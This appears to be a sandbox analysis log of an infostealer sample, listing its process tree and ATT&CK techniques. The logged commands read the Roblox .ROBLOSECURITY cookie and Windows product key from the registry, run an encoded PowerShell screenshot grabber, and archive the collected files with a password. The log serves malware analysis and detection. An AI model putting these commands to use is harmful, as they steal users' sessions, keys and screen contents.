      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4164
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4900
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4516
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4260
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2624
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3160
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\shq2w2du\shq2w2du.cmdline"
        5⤵
        
        PID:1196
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA18.tmp" "c:\Users\Admin\AppData\Local\Temp\shq2w2du\CSC95DD5CF7348E47A2B5F2B4B6FA2DC82F.TMP"
        6⤵
        
        PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4784
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2272
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1264
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1100
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2384
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4860
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2044
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2256
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2816
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20682\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Q6PVI.zip" *"
    3⤵
    PID:2416
  - - C:\Users\Admin\AppData\Local\Temp\_MEI20682\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI20682\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\Q6PVI.zip" *
      4⤵
      Executes dropped EXE
      PID:1428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3728
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd92ea3cb8,0x7ffd92ea3cc8,0x7ffd92ea3cd8
  2⤵
  PID:1724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
  2⤵
  PID:2864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
  2⤵
  PID:1332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:1260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
  2⤵
  PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3468 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
  2⤵
  PID:3996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13063629370438995922,9626584030548897803,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2804

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3432

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3808

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:4016

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39db055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2752

C:\Windows\system32\bootim.exe
bootim.exe /startpage:1
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005
